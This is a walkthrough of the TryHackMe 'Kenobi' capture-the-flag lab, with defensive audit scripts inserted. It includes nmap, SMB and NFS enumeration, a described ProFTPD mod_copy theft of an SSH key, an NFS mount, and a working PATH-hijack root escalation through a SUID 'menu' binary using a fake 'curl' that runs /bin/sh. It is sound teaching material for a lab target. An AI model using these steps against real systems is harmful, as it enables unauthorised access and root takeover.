Help Me, Obi-Wan Kenobi. You're My Only Hope: Navigating the Kenobi CTF on TryHackMe

This walkthrough will cover the Kenobi CTF found on TryHackMe. It will include accessing a Samba share, exploiting a vulnerable version of ProFtpd to gain initial access, and escalating privileges to root using a SUID binary.

Step 1: Nmap

nmap -A -p- -T4 10.10.117.14 -vvv
PORT      STATE SERVICE     REASON         VERSION
21/tcp    open  ftp         syn-ack ttl 61 ProFTPD 1.3.5
22/tcp    open  ssh         syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8m00IxH/X5gfu6Cryqi5Ti2TKUSpqgmhreJsfLL8uBJrGAKQApxZ0lq2rKplqVMs+xwlGTuHNZBVeURqvOe9MmkMUOh4ZIXZJ9KNaBoJb27fXIvsS6sgPxSUuaeoWxutGwHHCDUbtqHuMAoSE2Nwl8G+VPc2DbbtSXcpu5c14HUzktDmsnfJo/5TFiRuYR0uqH8oDl6Zy3JSnbYe/QY+AfTpr1q7BDV85b6xP97/1WUTCw54CKUTV25Yc5h615EwQOMPwox94+48JVmgE00T4ARC3l6YWibqY6a5E8BU+fksse35fFCwJhJEk6xplDkeauKklmVqeMysMWdiAQtDj
|   256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBBpJvoJrIaQeGsbHE9vuz4iUyrUahyfHhN7wq9z3uce9F+Cdeme1O+vIfBkmjQJKWZ3vmezLSebtW3VRxKKH3n8=
|   256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGB22m99Wlybun7o/h9e6Ea/9kHMT0Dz2GqSodFqIWDi
80/tcp    open  http        syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
111/tcp   open  rpcbind     syn-ack ttl 61 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100005  1,2,3      51719/udp6  mountd
|   100005  1,2,3      55558/udp   mountd
|   100005  1,2,3      59043/tcp   mountd
|   100005  1,2,3      60167/tcp6  mountd
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp   open  netbios-ssn syn-ack ttl 61 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open              syn-ack ttl 61 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp  open  nfs_acl     syn-ack ttl 61 2-3 (RPC #100227)
34619/tcp open  nlockmgr    syn-ack ttl 61 1-4 (RPC #100021)
46053/tcp open  mountd      syn-ack ttl 61 1-3 (RPC #100005)
59043/tcp open  mountd      syn-ack ttl 61 1-3 (RPC #100005)
60883/tcp open  mountd      syn-ack ttl 61 1-3 (RPC #100005)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94%E=4%D=7/7%OT=21%CT=1%CU=40628%PV=Y%DS=4%DC=T%G=Y%TM=64A89F2C
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%II=I%TS=8)SEQ(SP=10
OS:1%GCD=1%ISR=10A%TI=Z%II=I%TS=8)SEQ(SP=101%GCD=1%ISR=10A%TI=Z%CI=I%II=I%T
OS:S=8)SEQ(SP=101%GCD=2%ISR=109%TI=Z%II=I%TS=8)OPS(O1=M509ST11NW7%O2=M509ST
OS:11NW7%O3=M509NNT11NW7%O4=M509ST11NW7%O5=M509ST11NW7%O6=M509ST11)WIN(W1=6
OS:8DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M
OS:509NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T
OS:4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+
OS:%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y
OS:%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%
OS:RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.003 days (since Fri Jul  7 17:22:14 2023)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m03s, deviation: 2h53m12s, median: 2s
| nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   KENOBI<00>           Flags: <unique><active>
|   KENOBI<03>           Flags: <unique><active>
|   KENOBI<20>           Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|   WORKGROUP<1e>        Flags: <group><active>
| Statistics:
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00
| smb2-time: 
|   date: 2023-07-07T23:26:33
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: kenobi
|   NetBIOS computer name: KENOBI\x00
|   Domain name: \x00
|   FQDN: kenobi
|_  System time: 2023-07-07T18:26:33-05:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 18419/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 14290/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 27356/udp): CLEAN (Failed to receive data)
|   Check 4 (port 22821/udp): CLEAN (Failed to receive data)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

This box contains multiple attack vectors to help enumerate and gather useful information to gain our initial foothold. To begin, we will focus on port 445, SMB.

Step 2: Enumerate SMB

Using nmap scripts we can further enumerate port 445 to find available shares.

nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.165.161

There are a total of 3 shares. Let's connect to one of them using smbclient.

smbclient //10.10.165.161/anonymous

Upon connecting, we discover a log.txt file. We can pull this down using the smbget command.

smbget -R smb://10.10.165.161/anonymous

Step 3: Enumerate NFS

Similar to SMB, we can use nmap scripts to further enumerate NFS.

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.165.161

We discover /var is a mountable network drive.
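The two findings above, an SMB share open to anonymous users and an NFS export of /var, both come from server-side configuration. The following script is an added example, not part of the walkthrough or the TryHackMe room, showing how an administrator can audit /etc/exports and smb.conf for exactly these settings. The two config files it reads are constructed samples written to a temporary directory (the function names check_exports, check_smb_guest_shares and write_sample_configs are this example's own); point the functions at real files to audit a host.

```shell
#!/bin/sh
# Added example: flag NFS exports open to any client or without root squashing,
# and Samba shares that allow guest access. Sample configs are constructed.

# Print every export line whose client list contains a wildcard host or
# no_root_squash. Exit 0 if anything risky was found, 1 otherwise.
check_exports() {
    awk '
        /^[[:space:]]*#/ { next }      # comment line
        NF == 0 { next }               # blank line
        {
            risky = 0
            for (i = 2; i <= NF; i++)
                if ($i ~ /^\*/ || $i ~ /no_root_squash/) risky = 1
            if (risky) {
                printf "RISKY export %s -> %s\n", $1, substr($0, index($0, $2))
                n++
            }
        }
        END { if (n > 0) exit 0; exit 1 }
    ' "$1"
}

# Print every non-global smb.conf section that sets "guest ok = yes" (or its
# synonym "public = yes"). Exit 0 if a guest share exists, 1 otherwise.
check_smb_guest_shares() {
    awk '
        /^[[:space:]]*[;#]/ { next }               # comment line
        /^[[:space:]]*\[/ {                        # [section] header
            s = $0
            sub(/^[[:space:]]*\[/, "", s); sub(/\].*$/, "", s)
            section = s
            next
        }
        section != "" && section != "global" &&
        tolower($0) ~ /^[[:space:]]*(guest ok|public)[[:space:]]*=[[:space:]]*yes/ {
            printf "GUEST share [%s] allows anonymous access\n", section
            n++
        }
        END { if (n > 0) exit 0; exit 1 }
    ' "$1"
}

# Write constructed sample configs into directory $1 (modelled on what the
# room exposes: an export of /var and a share named "anonymous"; paths are made up).
write_sample_configs() {
    mkdir -p "$1"
    cat > "$1/exports" <<'EOF'
# constructed sample /etc/exports
/var        *(rw,sync,no_root_squash)
/srv/backup 10.0.0.0/24(ro,sync,root_squash)
/home       192.168.1.0/24(rw,sync,no_root_squash)
EOF
    cat > "$1/smb.conf" <<'EOF'
; constructed sample smb.conf
[global]
   workgroup = WORKGROUP
   map to guest = bad user
[anonymous]
   path = /srv/samba/anonymous
   browseable = yes
   guest ok = yes
[print$]
   path = /var/lib/samba/printers
   guest ok = no
EOF
}

# Demonstration on the constructed samples.
demo_dir=$(mktemp -d)
write_sample_configs "$demo_dir"
if check_exports "$demo_dir/exports"; then
    echo "nfs: restrict the exports above to specific hosts and keep root_squash"
fi
if check_smb_guest_shares "$demo_dir/smb.conf"; then
    echo "smb: decide whether the guest shares above really need anonymous access"
fi
rm -rf "$demo_dir"
```

On the sample, the /var and /home exports are reported (wildcard client, no_root_squash) while /srv/backup is not, and only the [anonymous] share is reported as guest-accessible. Both functions are also usable as a cron check: a zero exit status means something to review.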

Step 4: ProFtpd

Using netcat we can determine what version of ProFtpd is running.

nc 10.10.165.161 21

Let's use searchsploit to see if this version has a vulnerability.

searchsploit ProFtpd 1.3.5

Looks like there is a Metasploit module for the mod_copy vulnerability in this version. But let's do this the manual way using netcat.

Using the mod_copy commands over that netcat session, we copied Kenobi's private SSH key into /var/tmp, since our NFS enumeration in Step 3 showed that /var is exported. Let's mount that export now and look for the key under its tmp directory.

mkdir /mnt/kenobiNFS
mount 10.10.165.161:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS

We now have the export mounted on our attack box. Let's pull down the id_rsa SSH key and use it to connect to the box as the kenobi user.

We're in! You'll find your first flag at /home/kenobi/user.txt.

Step 5: Privesc and Root

Let's search the system for a binary running elevated permissions.

find / -perm -u=s -type f 2>/dev/null

The binary /usr/bin/menu is not an ordinary SUID file: it runs as root and invokes helper commands such as curl by name rather than by absolute path, so whichever curl the inherited PATH resolves first is what gets executed. Let's work from /tmp, since we know it's writable. There we create a file named curl that simply runs /bin/sh, make it executable, and put /tmp at the front of PATH.

cd /tmp
echo /bin/sh > curl
chmod 777 curl
export PATH=/tmp:$PATH
/usr/bin/menu

And we have root! Type cat /root/root.txt and you'll find your last flag.
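Two things a defender takes away from Step 5: a setuid binary that nobody put in a baseline is itself a finding, and a privileged program must never let an attacker-controlled PATH choose which helper it runs. The script below is an added example, not code from the walkthrough or the room. It builds a setuid inventory under a directory and diffs it against a baseline file (suid_diff), and it walks PATH twice for the same command name, once the naive way and once skipping world-writable directories (path_lookup), which is the difference between the vulnerable menu and a hardened one. The world-writable directory and the planted binary are created in a temporary directory; the function names are this example's own.

```shell
#!/bin/sh
# Added example: setuid inventory with baseline diff, and a PATH resolution
# that refuses world-writable directories. Everything runs in a temp dir.

# List files with the setuid bit set below $1, sorted, one absolute path per line.
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Print every setuid file under $2 that is absent from the (sorted) baseline
# file $1. Any output is the detection: a file gained the setuid bit.
suid_diff() {
    tmp=$(mktemp)
    list_suid "$2" > "$tmp"
    comm -13 "$1" "$tmp"
    rm -f "$tmp"
}

# True if directory $1 is writable by "others" (the /tmp situation).
# ls -L follows symlinks so a merged-usr /bin -> usr/bin link is judged by its target.
dir_world_writable() {
    perms=$(ls -ldL "$1" 2>/dev/null | cut -c1-10)
    case "$perms" in
        ????????w?) return 0 ;;
        *)          return 1 ;;
    esac
}

# Resolve command $1 by walking PATH in order, like execvp() or the shell does.
# Mode "naive" (default) takes the first executable it finds, which is how the
# planted /tmp/curl wins. Mode "strict" skips world-writable directories.
path_lookup() {
    name=$1 mode=${2:-naive}
    rest=$PATH
    while [ -n "$rest" ]; do
        dir=${rest%%:*}
        case "$rest" in *:*) rest=${rest#*:} ;; *) rest= ;; esac
        [ -n "$dir" ] || dir=.            # empty PATH entry means cwd
        if [ "$mode" = strict ] && dir_world_writable "$dir"; then
            continue
        fi
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir/$name"
            return 0
        fi
    done
    return 1
}

# Demonstration in a temporary directory (constructed, nothing touches real /tmp).
demo=$(mktemp -d)
mkdir -p "$demo/bin" "$demo/writable"
chmod 777 "$demo/writable"
printf '#!/bin/sh\necho hijacked\n' > "$demo/writable/sh"
chmod 755 "$demo/writable/sh"
printf '#!/bin/sh\n' > "$demo/bin/menu"
chmod 4755 "$demo/bin/menu"              # a setuid file that is not in the baseline
: > "$demo/baseline"                      # empty baseline: every setuid file is new
echo "new setuid files:"; suid_diff "$demo/baseline" "$demo/bin"
PATH="$demo/writable:$PATH"
echo "naive lookup of sh:  $(path_lookup sh naive)"
echo "strict lookup of sh: $(path_lookup sh strict)"
rm -rf "$demo"
```

The hardening for a program like menu is the strict rule in code: set PATH to a fixed list of root-owned directories before calling anything, or call helpers by absolute path. The baseline diff is the detection side; run list_suid at build time, store the output, and alert on anything suid_diff prints later.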

I hope you enjoyed this walkthrough of the Kenobi CTF found on TryHackMe. Happy Hacking.

Support Jake Garrison by becoming a sponsor. Any amount is appreciated!